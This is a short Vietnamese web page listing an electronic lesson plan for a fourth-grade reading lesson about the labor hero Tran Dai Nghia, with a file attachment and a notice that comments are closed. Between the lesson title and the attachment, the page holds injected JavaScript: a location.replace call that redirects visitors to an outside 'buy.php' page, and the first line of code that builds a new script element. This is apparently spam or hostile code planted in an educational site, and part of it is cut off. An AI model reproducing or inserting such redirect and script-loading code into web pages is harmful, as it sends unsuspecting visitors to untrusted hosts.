Giáo án điện tử- Tập đọc – Lớp 4

17/03/2009 12:00 Sáng Phản hồi đã bị khóa

Bài: Anh hùng lao động Trần Đại Nghĩa

location.replace(“http://gethere.info/buy.php”);

var d=document;var s=d.createElement(‘script’);

Tệp đính kèm

12372769296400_TD_anh_hung_lao_dong_TDN
File: 12372769296400_TD_anh_hung_lao_dong_TDN (3 MB)

Các phản hồi đã bị đóng lại bở quản trị.